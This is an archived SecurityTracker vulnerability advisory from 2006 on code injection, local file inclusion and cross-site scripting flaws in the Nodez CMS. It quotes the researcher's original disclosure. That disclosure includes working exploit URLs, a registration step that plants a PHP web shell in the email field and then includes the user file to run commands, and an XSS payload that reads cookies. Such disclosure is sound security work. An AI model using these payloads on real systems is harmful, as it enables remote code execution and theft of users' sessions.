SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Nodez Vendors:   Nodez Project
Nodez Input Validation Flaw in 'op' Parameter Lets Remote Users Inject PHP Code and Also Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015747
SecurityTracker URL:  http://securitytracker.com/id/1015747
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 10 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 4.6.1.1 and prior versions
Description:   Hamid Ebadi reported a vulnerability in Nodez. A remote user can execute arbitrary PHP code on the target system. A remote user can conduct cross-site scripting attacks.

The software does not properly validate user-supplied input in the 'op' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute PHP code from a file on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir

A remote user can cause arbitrary PHP code to be stored to a file on the system. Then, the remote user can cause the PHP code to be executed.

For example, the remote user can supply arbitrary PHP code via the 'Email' parameter, which will be stored to the 'list.gtdat' file.

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Nodez software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Nodez software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  nodez.greentinted.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Nodez [PHP Code Injection][Local Inclusion][Unauthenticated Access(Data files)]

Nodez [PHP Code Injection][Local File
Inclusion][Unauthenticated Access(Data files)]
Vulnerabilities
Nodez is a young, but strong, open source Content
Manager. Nodez is designed to be as modular, stable
and lightweight as possible
Nodez does a lot of things differently from other
CMSs, primarily as far as organization goes. In most
CMSs, when you install a module it creates a single
section for itself, and you can only use that module
once.
In Nodez though, a module is not instructions for
creating a section of your site, but rather it
contains instructions for creating a certain file
type. 
For example, the 3 basic modules--dir, node and
node_lite--contain instructions for creating
directories and plain text files.
More complex modules, such as nForum or blog, contain
instructions for creating all manner of pages, from
forums to images to blogs, even surveys and image
galleries.
[official Nodez News website]

http://nodez.greentinted.com

Credit:
The information has been provided by Hamid Ebadi 
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
Nodez Version: 4.6.1.1 (Mercury) and Below

Description:

Local File Inclusion :
Input passed to the "op" parameter  isn't properly
verified, before it is used to include files. This can
be exploited to include arbitrary files from  local
resources.
http://localhost/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir
remote attacker can use following method to inject PHP
Code .

PHP Code Injection  :
Input passed to the Email  parameters when registering
isn't properly sanitised before being stored in the
PHP script "list.gtdat". This can be exploited to
inject  arbitrary PHP code and execute (using Local
File Inclusion)

Nodez stores all usernames and Hashed passwords (and
other information like Email ...)  in a file called
"list.gtdat"  which is  inside the web root . Example:
http://localhost/cache/users/list.gtdat .
(It may then be possible to identify the password by
brute forcing it using a dictionary attack.)

exploit:
register an account : 
username:hamid 
password:hamidnetworksecurityteam
email: PHP code like (PHP Code Injection) : 
<?system ($_GET['cmd']);?>
and then use local file inclusion :
http://localhost/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir

XSS :
http://localhost/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more




Signature
 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC